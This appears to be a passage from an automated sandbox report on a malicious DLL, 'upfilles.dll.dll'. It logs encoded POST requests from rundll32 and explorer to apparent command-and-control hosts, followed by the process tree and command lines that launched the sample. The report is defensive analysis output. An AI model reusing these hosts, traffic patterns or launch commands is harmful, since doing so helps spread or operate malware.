                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:15 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:15 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:15 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.4497713.69.236.354437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:21 UTC281OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:21 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:21 UTC206INHTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 May 2024 22:05:21 GMT
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 9
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=15724800; includeSubDomains
                                                                                                                    2024-05-10 22:05:21 UTC9INData Raw: 4e 6f 74 20 46 6f 75 6e 64
                                                                                                                    Data Ascii: Not Found


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.449772138.124.183.2154437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:27 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: altynbe.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:27 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:27 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:27 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.449773138.124.183.2154437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:33 UTC245OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: altynbe.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:33 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:33 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:33 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.449774138.124.183.2154437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:34 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: altynbe.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:34 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:35 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:35 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.449775138.124.183.2154437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:39 UTC245OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: altynbe.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:39 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:40 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:40 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.44977695.164.68.734437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:41 UTC247OUTPOST /content.php HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: anikvan.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:41 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:42 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:42 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.449777104.21.16.1554432580C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:45 UTC229OUTPOST /live/ HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                    Host: workspacin.cloud
                                                                                                                    Content-Length: 248
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:45 UTC248OUTData Raw: 49 49 76 49 58 4a 74 65 6d 72 58 30 6e 71 61 31 4b 66 66 4a 68 53 52 75 64 6c 34 54 48 5a 41 53 6b 61 64 6e 73 2f 33 30 78 46 6a 62 6c 71 62 46 39 46 63 32 53 32 6c 48 67 44 52 50 41 6c 6c 74 55 4c 39 52 55 6d 52 41 65 30 49 44 48 4d 46 39 4c 30 39 70 6c 66 47 78 6e 4d 45 58 32 69 4f 6a 38 72 78 57 64 59 6f 43 42 4b 34 44 44 69 79 6b 59 4c 32 73 50 4a 48 55 37 7a 6d 66 4d 4e 4a 4f 54 72 6b 58 62 4c 4e 64 67 73 61 56 50 61 79 66 71 52 70 30 69 46 39 4a 6e 6c 4e 69 79 65 37 36 44 4c 79 47 56 66 68 70 35 57 6b 49 30 56 57 51 41 74 67 5a 64 32 41 59 32 74 59 77 52 2b 42 74 6e 61 4c 65 6a 42 37 76 30 31 6e 41 41 2b 39 33 49 4f 6e 53 77 71 56 4d 6e 2b 78 52 4b 64 6d 41 66 69 6b 31 70 4d 36 41 66 68 63 73 4f 58 2b 42 64 57 30 65 4d 51 66 71
                                                                                                                    Data Ascii: IIvIXJtemrX0nqa1KffJhSRudl4THZASkadns/30xFjblqbF9Fc2S2lHgDRPAlltUL9RUmRAe0IDHMF9L09plfGxnMEX2iOj8rxWdYoCBK4DDiykYL2sPJHU7zmfMNJOTrkXbLNdgsaVPayfqRp0iF9JnlNiye76DLyGVfhp5WkI0VWQAtgZd2AY2tYwR+BtnaLejB7v01nAA+93IOnSwqVMn+xRKdmAfik1pM6AfhcsOX+BdW0eMQfq
                                                                                                                    2024-05-10 22:05:53 UTC570INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 May 2024 22:05:53 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTiv4vVu1rumrKrAIXyBD8VGMPnhRvnHiuPBcMB4eDTwus2sF72HzgyQHeSyEMg87Zk0GJnOGApD7WRxGEtKkCzAKRtRg%2Ftf7fYbpJ303MrP9ARPvn7deUio6qJ%2Fabl9QCWA"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 881d3b84c8ab8c3b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-05-10 22:05:53 UTC26INData Raw: 31 34 0d 0a 41 4b 76 77 66 36 35 31 72 50 54 31 67 61 37 42 55 77 3d 3d 0d 0a
                                                                                                                    Data Ascii: 14AKvwf651rPT1ga7BUw==
                                                                                                                    2024-05-10 22:05:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.44977895.164.68.734437320C:\Windows\System32\rundll32.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:45 UTC245OUTPOST /api/azure HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
                                                                                                                    Host: anikvan.com
                                                                                                                    Content-Length: 154
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:45 UTC154OUTData Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
                                                                                                                    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
                                                                                                                    2024-05-10 22:05:46 UTC150INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Date: Fri, 10 May 2024 22:05:46 GMT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.449782104.21.16.1554432580C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-05-10 22:05:54 UTC229OUTPOST /live/ HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                    Host: workspacin.cloud
                                                                                                                    Content-Length: 180
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-05-10 22:05:54 UTC180OUTData Raw: 49 49 76 49 58 4a 74 65 6d 72 58 31 6e 71 61 31 4b 66 66 4a 68 53 52 75 64 6c 34 54 48 5a 41 53 6b 61 64 6e 73 2f 33 30 78 46 6a 62 6c 71 62 46 39 46 63 32 53 32 6c 48 67 44 52 50 41 6c 6c 74 55 4c 39 52 55 6d 52 41 65 30 49 44 48 4d 46 39 4c 30 39 70 6c 66 47 78 6e 4d 45 58 32 69 4f 6a 38 72 78 57 64 59 6f 43 42 4b 34 44 44 69 79 6b 59 4c 32 73 50 4a 48 55 37 7a 6d 66 4d 4e 4a 4f 54 72 6b 58 62 4c 4e 64 67 73 61 56 50 61 79 66 71 52 70 30 69 46 39 4a 6e 6c 4e 69 79 65 37 36 44 4c 79 47 56 66 68 70 35 57 6b 49 30 56 57 51 41 74 67 3d
                                                                                                                    Data Ascii: IIvIXJtemrX1nqa1KffJhSRudl4THZASkadns/30xFjblqbF9Fc2S2lHgDRPAlltUL9RUmRAe0IDHMF9L09plfGxnMEX2iOj8rxWdYoCBK4DDiykYL2sPJHU7zmfMNJOTrkXbLNdgsaVPayfqRp0iF9JnlNiye76DLyGVfhp5WkI0VWQAtg=
                                                                                                                    2024-05-10 22:06:11 UTC574INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 10 May 2024 22:06:11 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9bY1KwWUy0LTwNia%2F0eOSRBpY1hleYMm6esKPxUNDPeDXRdIEu5km4Bj5lacbpsOKrp8rjIXk%2FpRq4ha4Ew7ouYb9TrhFm944mDP4sysin88bz%2Fc1AvX092U9i4G%2FB4052D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 881d3bc26817c402-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-05-10 22:06:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:00:03:58
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\loaddll64.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
                                                                                                                    Imagebase:0x7ff61d400000
                                                                                                                    File size:165'888 bytes
                                                                                                                    MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:1
                                                                                                                    Start time:00:03:59
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:00:03:59
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                                                                                                                    Imagebase:0x7ff70e6c0000
                                                                                                                    File size:289'792 bytes
                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:00:03:59
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
                                                                                                                    Imagebase:0x7ff64ee30000
                                                                                                                    File size:25'088 bytes
                                                                                                                    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:00:03:59
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:00:03:59
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:00:04:02
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:9
                                                                                                                    Start time:00:04:02
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
                                                                                                                    Imagebase:0x7ff67a3b0000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:10
                                                                                                                    Start time:00:04:05
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:12
                                                                                                                    Start time:00:04:05
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
                                                                                                                    Imagebase:0x7ff67a3b0000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:13
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:14
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:15
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
